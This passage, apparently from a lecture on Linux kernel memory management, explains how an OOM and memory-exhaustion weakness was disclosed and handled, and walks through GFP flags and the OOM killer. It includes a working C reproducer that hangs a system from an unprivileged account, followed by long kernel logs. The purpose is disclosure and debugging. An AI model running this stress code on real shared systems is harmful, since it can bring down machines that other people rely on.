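	/* ... critical section ... */
	mutex_unlock(&my_lock);
}

/* Essentially killable: the wait is aborted when SIGKILL is delivered,
 * at the cost of an error path which every caller must handle. */
static int do_work_killable(void)
{
	if (mutex_lock_killable(&my_lock))
		return -EINTR;
	/* ... critical section ... */
	mutex_unlock(&my_lock);
	return 0;
}
---------- killable-vs-unkillable.c (sketch) ----------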
Although I demonstrated the problematic behavior that a system hangs up when this vulnerability is exploited, the vulnerability was not taken seriously, and what I got were responses like "Your system is already under a DoS attack and it is too late to recover. Give up and restart your system."
Also, since this vulnerability was considered a topic which should be discussed in public, the discussion moved to public mailing lists in November 2014.
Since I am not good at discussions, I made the people involved angry many times.
Posting to public mailing lists a reproducer program which exploits a not-yet-fixed vulnerability, just to demonstrate that the system hangs up, is not a good idea. Also, reproducing the hang up using this vulnerability could have led to the conditioned response of "Your system is already under a DoS attack and it is too late to recover."
Therefore, I posted many reproducer programs, developed by trial and error, which do not exploit this vulnerability. I also imposed the constraint that a local unprivileged user must be able to reproduce the hang up with a finite amount of stress, in order to distinguish it from simple overloading (which applies stress forever) and to demonstrate that this hang up can occur on real systems.
But the discussion spread too widely, because this attempt uncovered too many problems. So let me first explain how this vulnerability was concluded.
At the end of 2015, patches which mitigate this vulnerability were proposed on a public mailing list, and the vulnerability went public. The patches were then merged into Linux 4.5 (released in March 2016).
But since I gave the "Mitigates: CVE-2013-4312 (Linux 2.0+)" tag to both patches, which were posted at almost the same time, there was confusion. As a result, the attack which exhausts all file descriptors using Unix domain sockets (which had been discussed without a CVE number assigned) became CVE-2013-4312, and the attack which exhausts all kernel memory using pipe buffers (which had been discussed as CVE-2013-4312) became CVE-2016-2847.
Anyway, the file descriptor exhaustion attack was solved, and the kernel memory exhaustion attack was mitigated to some degree.
In May 2016, I noticed that a patch for tracking pipe buffer memory using kmemcg had (again) been posted to public mailing lists. (I had not noticed the first post, in September 2015.)
"Huh? Wasn't memory used for pipe's buffer already tracked using kmemcg since Linux 3.8? We had been discussing this vulnerability based on that assumption."
So I asked the author of the patch and got the reply: "Only memory for the pipe's metadata was tracked by kmemcg. Memory for the pipe's buffer (anonymous pipe buffer pages) was never tracked until now."
··· Wow! It turned out that kmemcg, which had been assumed to mitigate this vulnerability, was hardly effective at all. In other words, for this vulnerability, the "unless resources are appropriately restricted using memory cgroup" disclaimer did not hold.
Now, (finally?) I'd like to get to the main point of this lecture.
A data structure for managing processes/threads.
A data structure for managing signals.
A data structure for managing memory used by processes which run in userspace.
Single process / single thread
Multiple processes. Can be created by fork().
"Honest" multithreading. Can be created by clone() with CLONE_VM, CLONE_SIGHAND and CLONE_THREAD.
"Twisted" multithreading. Can be created by clone() with CLONE_VM but without CLONE_SIGHAND. (A sketch of all three forms appears after these items.)
Basically does not have an mm_struct.
Queues implemented by kernel threads (for processing work items issued by various threads).
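As referenced above, here is a minimal userspace sketch of mine showing how the three process/thread forms are created. The child() function, the stack sizes and the final sleep() are arbitrary choices, and error handling is omitted:
---------- clone-forms.c (sketch) ----------
#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>

static int child(void *arg)
{
	pause();
	return 0;
}

int main(void)
{
	char *stack1 = malloc(65536);
	char *stack2 = malloc(65536);

	/* Multiple processes: the child gets its own mm_struct. */
	if (fork() == 0)
		_exit(0);

	/* "Honest" multithreading: shares mm_struct and signal handling. */
	clone(child, stack1 + 65536,
	      CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, NULL);

	/* "Twisted" multithreading: shares mm_struct only. */
	clone(child, stack2 + 65536, CLONE_VM | SIGCHLD, NULL);

	sleep(1);
	return 0;
}
---------- clone-forms.c (sketch) ----------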
Using "page" which is 4096 bytes as a base, and managing using "order" as index for grouping in the power of 2 sizes like order-0 (for 1 byte to 4096 bytes), order-1 (for 4097 bytes to 8192 bytes), order-2 (for 8193 bytes to 16384 bytes) ···.
There is also the slab allocator for managing small, fixed-size allocation requests, but I do not explain it here because it is not important for this lecture.
The OOM killer takes only memory associated with an mm_struct into account; it does not take memory associated with file descriptors into account.
This assumes that the majority of memory is associated with mm_structs. Therefore, when the system is hit by an attack which consumes all memory as pipe buffers attached to many file descriptors, the OOM killer ends up killing mostly innocent processes one by one. (A simplified sketch of the score calculation follows.)
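For reference, here is my simplified approximation of the badness score heuristic of that kernel era (not the literal source). Every input comes from the mm_struct, so memory held in pipe buffers contributes nothing to the score:
---------- oom-badness.c (sketch) ----------
/* rss, nr_ptes and swapents correspond to the per-process columns in
 * the OOM killer's task dump shown in the logs above. */
static long oom_badness_sketch(long rss, long nr_ptes, long swapents,
			       long oom_score_adj, long totalpages)
{
	long points = rss + nr_ptes + swapents;

	/* oom_score_adj (-1000..1000) shifts the score by up to the
	 * total number of pages. */
	points += oom_score_adj * totalpages / 1000;
	return points > 0 ? points : 0;
}
---------- oom-badness.c (sketch) ----------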
kmemcg, which is part of the memory cgroup functionality, can track memory used inside the kernel. The normal memory cgroup (that is, not kmemcg) tracks memory associated with mm_structs.
When requesting memory, the requester specifies a bitmask called GFP flags. This bitmask controls which actions may be taken to make memory available (e.g. reclaiming memory used for caching) and how hard the kernel should try to reclaim memory. This is a world which userspace memory allocation requests (e.g. malloc()) know nothing about.
GFP_KERNEL (__GFP_RECLAIM | __GFP_IO | __GFP_FS) | Used mainly by applications (the contractors). If needed, the kernel can perform fs writeback operations (reflecting changes to filesystems) thanks to the __GFP_FS flag, and/or storage I/O (read/write) operations thanks to the __GFP_IO flag. |
GFP_NOFS (__GFP_RECLAIM | __GFP_IO) | Used mainly by filesystems (the subcontractors). If needed, the kernel can perform storage I/O operations thanks to the __GFP_IO flag. But in order to avoid deadlocks, the kernel cannot perform fs writeback operations. |
GFP_NOIO (__GFP_RECLAIM) | Used mainly by device drivers (the sub-subcontractors). In order to avoid deadlocks, the kernel can perform neither fs writeback operations nor storage I/O operations. |
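As a concrete illustration, a filesystem code path would pick its GFP mask like this (a sketch of mine; kmalloc() and the GFP_* constants are real kernel APIs, while fs_do_something() is hypothetical):
---------- gfp-by-context.c (sketch) ----------
#include <linux/slab.h>
#include <linux/errno.h>

/* Hypothetical filesystem helper. */
static int fs_do_something(size_t len)
{
	/*
	 * We run in filesystem (subcontractor) context: allowing
	 * __GFP_FS here could recurse into fs writeback, so use
	 * GFP_NOFS. Storage I/O (__GFP_IO) is still permitted.
	 */
	void *p = kmalloc(len, GFP_NOFS);

	if (!p)
		return -ENOMEM;
	/* ... use p ... */
	kfree(p);
	return 0;
}
---------- gfp-by-context.c (sketch) ----------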
For example, if the __GFP_FS flag (which allows the kernel to perform fs writeback operations) is specified by mistake on a memory allocation request made while a filesystem lock is held, there is a possibility of deadlock.
Also, no messages are printed when such a deadlock actually occurs; it just looks as if the system hung up for no reason.
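The deadlock pattern looks like this (a hypothetical sketch; fs_lock and buggy_fs_path() are made up):
---------- gfp-fs-deadlock.c (sketch) ----------
#include <linux/mutex.h>
#include <linux/slab.h>

static DEFINE_MUTEX(fs_lock);	/* hypothetical filesystem lock */

static void buggy_fs_path(size_t len)
{
	void *p;

	mutex_lock(&fs_lock);
	/*
	 * BUG: GFP_KERNEL includes __GFP_FS. If direct reclaim enters
	 * fs writeback, and writeback tries to take fs_lock, this call
	 * never returns and nothing is printed. GFP_NOFS should have
	 * been used here.
	 */
	p = kmalloc(len, GFP_KERNEL);
	kfree(p);
	mutex_unlock(&fs_lock);
}
---------- gfp-fs-deadlock.c (sketch) ----------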
Since nobody actively tests out-of-memory behavior, the error handling paths for memory allocation failures are hardly ever exercised. Therefore, we can observe various strange behaviors if we intentionally make memory allocation requests fail.
If a memory allocation request absolutely must succeed, the kernel specifies the __GFP_NOFAIL flag, which allows invoking the OOM killer. But since a large __GFP_NOFAIL request risks terminating the majority of processes when memory is fragmented, large allocations are commonly served by vmalloc(), which can satisfy large requests at the cost of some performance penalty, instead of specifying __GFP_NOFAIL.
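For example (a sketch of mine; vmalloc() is a real API, while alloc_big_buffer() is hypothetical):
---------- vmalloc-large.c (sketch) ----------
#include <linux/vmalloc.h>

/* Hypothetical helper for a large buffer. */
static void *alloc_big_buffer(size_t len)
{
	/*
	 * A high-order kmalloc(len, GFP_KERNEL | __GFP_NOFAIL) would
	 * need physically contiguous pages and, under fragmentation,
	 * could keep the OOM killer killing processes. vmalloc()
	 * builds the buffer from order-0 pages instead; it is only
	 * virtually contiguous. Free with vfree().
	 */
	return vmalloc(len);
}
---------- vmalloc-large.c (sketch) ----------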
There might be memory which could be reclaimed if an fs writeback operation were performed (i.e. with GFP_KERNEL). Therefore, in order to avoid killing processes prematurely, the kernel does not invoke the OOM killer unless the __GFP_FS flag or the __GFP_NOFAIL flag is specified.
Killing a process means that its working state is lost. Since the OOM killer reclaims memory by killing processes, it is expected not to kill more processes than needed. Therefore, the kernel uses the TIF_MEMDIE flag to mark that "this process was chosen for termination by the OOM killer".
The kernel gives two exceptional behaviors to a process with the TIF_MEMDIE flag set: such a process is allowed to allocate from the "memory reserves" by ignoring the watermarks, and the OOM killer does not select further victims while a TIF_MEMDIE process still exists.
Step 1: Before the OOM situation occurs
Step 2: Immediately after the OOM situation occurs
Step 3: The OOM killer kills a process
Step 4: The process survives the OOM situation by allocating from the "memory reserves"
Step 5: The process releases its mm_struct
Step 6: After the OOM situation is resolved
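The first exceptional behavior (Step 4 above) can be sketched as follows. This is simplified by me from the page allocator slow path of that era, not the literal source; ALLOC_NO_WATERMARKS is an allocator-internal flag:
---------- tif-memdie.c (sketch) ----------
#include <linux/sched.h>

/* Simplified: a TIF_MEMDIE task may ignore the watermarks and dip
 * into the memory reserves, so that it can exit and free its memory. */
static int adjust_alloc_flags(int alloc_flags)
{
	if (test_thread_flag(TIF_MEMDIE))
		alloc_flags |= ALLOC_NO_WATERMARKS;
	return alloc_flags;
}
---------- tif-memdie.c (sketch) ----------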
When an application performs asynchronous writes to a file, the content to be written is first cached in memory allocated by GFP_KERNEL allocation requests. Then, periodically or on an as-needed basis, the content is reflected to the filesystem using memory allocated by GFP_NOFS allocation requests. And when reflecting the changes to the filesystem, the storage I/O is performed using memory allocated by GFP_NOIO allocation requests.
This means that, in order to satisfy GFP_KERNEL allocation requests (the contractors' requests), GFP_NOFS allocation requests (the subcontractors' requests) need to be satisfied; and in order to satisfy GFP_NOFS allocation requests, GFP_NOIO allocation requests (the sub-subcontractors' requests) need to be satisfied.
But all allocation requests are gated by the same watermark (the min: level). In other words, when GFP_KERNEL allocation requests cannot be satisfied, GFP_NOFS and GFP_NOIO allocation requests cannot be satisfied either, as the trivial sketch below shows.
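---------- one-watermark.c (sketch) ----------
#include <stdbool.h>
#include <stdio.h>

/* GFP_KERNEL, GFP_NOFS and GFP_NOIO are all gated by the same min:
 * watermark, so once one of them cannot be satisfied, none can. */
static bool watermark_ok(unsigned long free_kb, unsigned long min_kb)
{
	return free_kb > min_kb;
}

int main(void)
{
	/* DMA32 values from the logs above: free:44608kB min:44668kB. */
	printf("%d\n", watermark_ok(44608, 44668));	/* prints 0 */
	return 0;
}
---------- one-watermark.c (sketch) ----------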
That is, if the kernel does not want to invoke the OOM killer for GFP_NOFS (subcontractor) and GFP_NOIO (sub-subcontractor) allocation requests, it has no choice but to deny (i.e. fail) such allocation requests, doesn't it?
But failing storage I/O because a sub-subcontractor's memory allocation failed damages the subcontractor (filesystem inconsistency). For example, if the ext4 filesystem encounters such a failure, the filesystem will be remounted read-only or will trigger a kernel panic.
Likewise, failing a filesystem read/write because a subcontractor's memory allocation failed damages the contractor (the application). For example, content written by asynchronous write requests will be lost.
Therefore, we do not want the kernel to willingly deny subcontractors' / sub-subcontractors' allocation requests just to avoid invoking the OOM killer ···.
It seems we can reproduce this by concurrently running a process which consumes all memory using malloc() + memset() and processes which consume a little memory by doing asynchronous file writes.
---------- memset+write.c ----------
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
	unsigned long size;
	char *buf = NULL;
	unsigned long i;
	/* Writers: 10 children keep appending to a file asynchronously. */
	for (i = 0; i < 10; i++) {
		if (fork() == 0) {
			static char buf[4096];
			const int fd = open("/tmp/file",
					    O_CREAT | O_WRONLY | O_APPEND, 0600);
			while (write(fd, buf, sizeof(buf)) == sizeof(buf));
			pause();
			_exit(0);
		}
	}
	/* Eater: grab as much virtual memory as realloc() will give us. */
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	sleep(5);
	/* Will cause OOM due to overcommit: touch one byte per page. */
	for (i = 0; i < size; i += 4096)
		buf[i] = 0;
	pause();
	return 0;
}
---------- memset+write.c ----------
---------- Example output start ---------- [ 67.776733] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 67.778409] memset+write cpuset=/ mems_allowed=0 [ 67.779310] CPU: 1 PID: 4158 Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1 [ 67.780988] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 67.783002] ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c [ 67.784679] ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768 [ 67.786253] 0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f [ 67.788065] Call Trace: [ 67.788645] [<ffffffff81635a0c>] dump_stack+0x19/0x1b [ 67.789606] [<ffffffff816309ac>] dump_header+0x8e/0x214 [ 67.790620] [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0 [ 67.791957] [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0 [ 67.793085] [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0 [ 67.794515] [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30 [ 67.795730] [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0 [ 67.796792] [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90 [ 67.798004] [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140 [ 67.799125] [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50 [ 67.800228] [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900 [ 67.801479] [<ffffffff816416c0>] __do_page_fault+0x150/0x450 [ 67.802749] [<ffffffff816419e3>] do_page_fault+0x23/0x80 [ 67.803803] [<ffffffff8163dc48>] page_fault+0x28/0x30 [ 67.804805] Mem-Info: [ 67.805259] Node 0 DMA per-cpu: [ 67.806084] CPU 0: hi: 0, btch: 1 usd: 0 [ 67.807042] CPU 1: hi: 0, btch: 1 usd: 0 [ 67.807971] CPU 2: hi: 0, btch: 1 usd: 0 [ 67.809149] CPU 3: hi: 0, btch: 1 usd: 0 [ 67.810041] Node 0 DMA32 per-cpu: [ 67.810743] CPU 0: hi: 186, btch: 31 usd: 32 [ 67.811942] CPU 1: hi: 186, btch: 31 usd: 0 [ 67.812860] CPU 2: hi: 186, btch: 31 usd: 211 [ 67.813691] CPU 3: hi: 186, btch: 31 usd: 50 [ 67.814633] active_anon:385124 inactive_anon:2096 isolated_anon:0 [ 67.814633] active_file:6184 inactive_file:9766 isolated_file:0 [ 67.814633] unevictable:0 dirty:552 writeback:9326 unstable:0 [ 67.814633] free:15848 slab_reclaimable:4962 slab_unreclaimable:5615 [ 67.814633] mapped:5933 shmem:2161 pagetables:2108 bounce:0 [ 67.814633] free_cma:0 [ 67.822567] Node 0 DMA free:7432kB min:400kB low:500kB high:600kB active_anon:7240kB inactive_anon:0kB active_file:200kB inactive_file:148kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:204kB mapped:184kB shmem:0kB slab_reclaimable:112kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:27 all_unreclaimable? no [ 67.831956] lowmem_reserve[]: 0 1720 1720 1720 [ 67.833707] Node 0 DMA32 free:53824kB min:44652kB low:55812kB high:66976kB active_anon:1533256kB inactive_anon:8384kB active_file:24536kB inactive_file:40900kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:1840kB writeback:39308kB mapped:23548kB shmem:8644kB slab_reclaimable:19736kB slab_unreclaimable:22300kB kernel_stack:6528kB pagetables:8140kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:448 all_unreclaimable? 
no [ 67.844988] lowmem_reserve[]: 0 0 0 0 [ 67.846636] Node 0 DMA: 22*4kB (UEM) 13*8kB (UEM) 11*16kB (UEM) 4*32kB (UEM) 2*64kB (EM) 1*128kB (E) 2*256kB (UM) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7408kB [ 67.851731] Node 0 DMA32: 941*4kB (UE) 693*8kB (UEM) 270*16kB (UEM) 216*32kB (UE) 117*64kB (UEM) 52*128kB (UEM) 27*256kB (UEM) 8*512kB (EM) 3*1024kB (M) 1*2048kB (M) 0*4096kB = 50812kB [ 67.857304] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 67.859927] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 67.862160] 19726 total pagecache pages [ 67.863651] 0 pages in swap cache [ 67.865041] Swap cache stats: add 0, delete 0, find 0/0 [ 67.866736] Free swap = 0kB [ 67.868016] Total swap = 0kB [ 67.869295] 524157 pages RAM [ 67.870684] 0 pages HighMem/MovableOnly [ 67.872163] 79320 pages reserved [ 67.873467] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 67.875840] [ 588] 0 588 9204 680 19 0 0 systemd-journal [ 67.878421] [ 604] 0 604 10814 485 21 0 -1000 systemd-udevd [ 67.878422] [ 912] 0 912 12803 451 25 0 -1000 auditd [ 67.878424] [ 1967] 70 1967 6997 389 18 0 0 avahi-daemon [ 67.878425] [ 1979] 0 1979 72391 1429 42 0 0 rsyslogd [ 67.878426] [ 1982] 0 1982 80896 5753 78 0 0 firewalld [ 67.878427] [ 1983] 0 1983 4829 316 14 0 0 irqbalance [ 67.878428] [ 1984] 0 1984 6612 435 15 0 0 systemd-logind [ 67.878429] [ 1985] 81 1985 6672 465 18 0 -900 dbus-daemon [ 67.878430] [ 1990] 70 1990 6997 58 17 0 0 avahi-daemon [ 67.878431] [ 2015] 0 2015 52593 1356 56 0 0 abrtd [ 67.878433] [ 2017] 0 2017 51993 1133 54 0 0 abrt-watch-log [ 67.878434] [ 2018] 0 2018 1094 148 8 0 0 rngd [ 67.878435] [ 2044] 0 2044 31583 393 21 0 0 crond [ 67.878436] [ 2181] 0 2181 46752 1141 41 0 0 vmtoolsd [ 67.878438] [ 2803] 0 2803 27631 3192 51 0 0 dhclient [ 67.878439] [ 2807] 999 2807 132051 3450 54 0 0 polkitd [ 67.878440] [ 2890] 0 2890 20640 900 40 0 -1000 sshd [ 67.878441] [ 2893] 0 2893 138262 4089 91 0 0 tuned [ 67.878442] [ 4096] 0 4096 22785 519 42 0 0 master [ 67.878443] [ 4102] 0 4102 64751 2099 57 0 -900 abrt-dbus [ 67.878445] [ 4108] 0 4108 23201 674 51 0 0 login [ 67.878445] [ 4109] 0 4109 27509 214 12 0 0 agetty [ 67.878446] [ 4113] 0 4113 79455 691 104 0 0 nmbd [ 67.878447] [ 4115] 89 4115 22811 976 44 0 0 pickup [ 67.878448] [ 4116] 89 4116 22828 984 45 0 0 qmgr [ 67.878450] [ 4130] 0 4130 96508 1392 138 0 0 smbd [ 67.878451] [ 4134] 0 4134 96508 735 132 0 0 smbd [ 67.878452] [ 4137] 1000 4137 28884 534 14 0 0 bash [ 67.878454] [ 4158] 1000 4158 541715 366511 725 0 0 memset+write [ 67.878455] [ 4159] 1000 4159 1042 21 6 0 0 memset+write [ 67.878456] [ 4160] 1000 4160 1042 21 6 0 0 memset+write [ 67.878457] [ 4161] 1000 4161 1042 21 6 0 0 memset+write [ 67.878458] [ 4162] 1000 4162 1042 21 6 0 0 memset+write [ 67.878459] [ 4163] 1000 4163 1042 21 6 0 0 memset+write [ 67.878460] [ 4164] 1000 4164 1042 21 6 0 0 memset+write [ 67.878461] [ 4165] 1000 4165 1042 21 6 0 0 memset+write [ 67.878461] [ 4166] 1000 4166 1042 21 6 0 0 memset+write [ 67.878462] [ 4167] 1000 4167 1042 21 6 0 0 memset+write [ 67.878463] [ 4168] 1000 4168 1042 21 6 0 0 memset+write [ 67.878464] Out of memory: Kill process 4158 (memset+write) score 825 or sacrifice child [ 67.878467] Killed process 4159 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB [ 68.333885] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 68.335891] memset+write cpuset=/ mems_allowed=0 [ 68.337124] CPU: 0 PID: 4158 
Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1 [ 68.339035] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 68.341410] ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c [ 68.343326] ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768 [ 68.345256] 0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f [ 68.347163] Call Trace: [ 68.348064] [<ffffffff81635a0c>] dump_stack+0x19/0x1b [ 68.349439] [<ffffffff816309ac>] dump_header+0x8e/0x214 [ 68.350859] [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0 [ 68.352320] [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0 [ 68.353847] [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0 [ 68.355373] [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30 [ 68.357016] [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0 [ 68.358503] [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90 [ 68.360124] [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140 [ 68.361635] [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50 [ 68.363147] [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900 [ 68.364612] [<ffffffff816416c0>] __do_page_fault+0x150/0x450 [ 68.366144] [<ffffffff816419e3>] do_page_fault+0x23/0x80 [ 68.367616] [<ffffffff8163dc48>] page_fault+0x28/0x30 [ 68.369019] Mem-Info: [ 68.369890] Node 0 DMA per-cpu: [ 68.370979] CPU 0: hi: 0, btch: 1 usd: 0 [ 68.372543] CPU 1: hi: 0, btch: 1 usd: 0 [ 68.373900] CPU 2: hi: 0, btch: 1 usd: 0 [ 68.375258] CPU 3: hi: 0, btch: 1 usd: 0 [ 68.376576] Node 0 DMA32 per-cpu: [ 68.377683] CPU 0: hi: 186, btch: 31 usd: 0 [ 68.379041] CPU 1: hi: 186, btch: 31 usd: 0 [ 68.380402] CPU 2: hi: 186, btch: 31 usd: 0 [ 68.381744] CPU 3: hi: 186, btch: 31 usd: 33 [ 68.383107] active_anon:404397 inactive_anon:2096 isolated_anon:0 [ 68.383107] active_file:82 inactive_file:0 isolated_file:0 [ 68.383107] unevictable:0 dirty:2 writeback:64 unstable:0 [ 68.383107] free:12956 slab_reclaimable:4712 slab_unreclaimable:5666 [ 68.383107] mapped:489 shmem:2161 pagetables:2146 bounce:0 [ 68.383107] free_cma:0 [ 68.391582] Node 0 DMA free:7272kB min:400kB low:500kB high:600kB active_anon:7948kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:40kB mapped:16kB shmem:0kB slab_reclaimable:52kB slab_unreclaimable:164kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 68.400580] lowmem_reserve[]: 0 1720 1720 1720 [ 68.402208] Node 0 DMA32 free:44552kB min:44652kB low:55812kB high:66976kB active_anon:1609640kB inactive_anon:8384kB active_file:328kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:8kB writeback:216kB mapped:1940kB shmem:8644kB slab_reclaimable:18796kB slab_unreclaimable:22500kB kernel_stack:6528kB pagetables:8292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2005 all_unreclaimable? 
yes [ 68.412886] lowmem_reserve[]: 0 0 0 0 [ 68.414465] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 68.419424] Node 0 DMA32: 910*4kB (UEM) 568*8kB (UEM) 153*16kB (UEM) 151*32kB (UE) 94*64kB (UEM) 58*128kB (UEM) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44776kB [ 68.424683] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 68.427106] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 68.429457] 2258 total pagecache pages [ 68.430956] 0 pages in swap cache [ 68.432384] Swap cache stats: add 0, delete 0, find 0/0 [ 68.434187] Free swap = 0kB [ 68.435545] Total swap = 0kB [ 68.436865] 524157 pages RAM [ 68.438225] 0 pages HighMem/MovableOnly [ 68.439698] 79320 pages reserved [ 68.441072] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 68.443320] [ 588] 0 588 9204 395 19 0 0 systemd-journal [ 68.445710] [ 604] 0 604 10814 176 21 0 -1000 systemd-udevd [ 68.448100] [ 912] 0 912 12803 122 25 0 -1000 auditd [ 68.450370] [ 1967] 70 1967 6997 63 18 0 0 avahi-daemon [ 68.452736] [ 1979] 0 1979 72391 926 42 0 0 rsyslogd [ 68.455063] [ 1982] 0 1982 80896 4270 78 0 0 firewalld [ 68.457297] [ 1983] 0 1983 4829 87 14 0 0 irqbalance [ 68.459638] [ 1984] 0 1984 6612 86 15 0 0 systemd-logind [ 68.462043] [ 1985] 81 1985 6672 128 18 0 -900 dbus-daemon [ 68.464379] [ 1990] 70 1990 6997 58 17 0 0 avahi-daemon [ 68.466708] [ 2015] 0 2015 52593 433 56 0 0 abrtd [ 68.468963] [ 2017] 0 2017 51993 352 54 0 0 abrt-watch-log [ 68.471530] [ 2018] 0 2018 1094 24 8 0 0 rngd [ 68.473807] [ 2044] 0 2044 31583 155 21 0 0 crond [ 68.476153] [ 2181] 0 2181 46752 262 41 0 0 vmtoolsd [ 68.478435] [ 2803] 0 2803 27631 3114 51 0 0 dhclient [ 68.480782] [ 2807] 999 2807 132051 2260 54 0 0 polkitd [ 68.483093] [ 2890] 0 2890 20640 222 40 0 -1000 sshd [ 68.485357] [ 2893] 0 2893 138262 2668 91 0 0 tuned [ 68.487615] [ 4096] 0 4096 22785 252 42 0 0 master [ 68.489912] [ 4102] 0 4102 64751 1000 57 0 -900 abrt-dbus [ 68.492253] [ 4108] 0 4108 23201 170 51 0 0 login [ 68.494525] [ 4109] 0 4109 27509 37 12 0 0 agetty [ 68.496785] [ 4113] 0 4113 79455 358 104 0 0 nmbd [ 68.499056] [ 4115] 89 4115 22811 253 44 0 0 pickup [ 68.501186] [ 4116] 89 4116 22828 250 45 0 0 qmgr [ 68.503333] [ 4130] 0 4130 96508 528 138 0 0 smbd [ 68.505438] [ 4134] 0 4134 96508 528 132 0 0 smbd [ 68.507535] [ 4137] 1000 4137 28884 134 14 0 0 bash [ 68.509598] [ 4158] 1000 4158 541715 385692 763 0 0 memset+write [ 68.511764] [ 4160] 1000 4160 1042 21 6 0 0 memset+write [ 68.513959] [ 4161] 1000 4161 1042 21 6 0 0 memset+write [ 68.515999] [ 4162] 1000 4162 1042 21 6 0 0 memset+write [ 68.518104] [ 4163] 1000 4163 1042 21 6 0 0 memset+write [ 68.520170] [ 4164] 1000 4164 1042 21 6 0 0 memset+write [ 68.522145] [ 4165] 1000 4165 1042 21 6 0 0 memset+write [ 68.524082] [ 4166] 1000 4166 1042 21 6 0 0 memset+write [ 68.526037] [ 4167] 1000 4167 1042 21 6 0 0 memset+write [ 68.527964] [ 4168] 1000 4168 1042 21 6 0 0 memset+write [ 68.529921] Out of memory: Kill process 4158 (memset+write) score 868 or sacrifice child [ 68.531913] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB (Since no response, I pressed SysRq-m in order to show memory state.) 
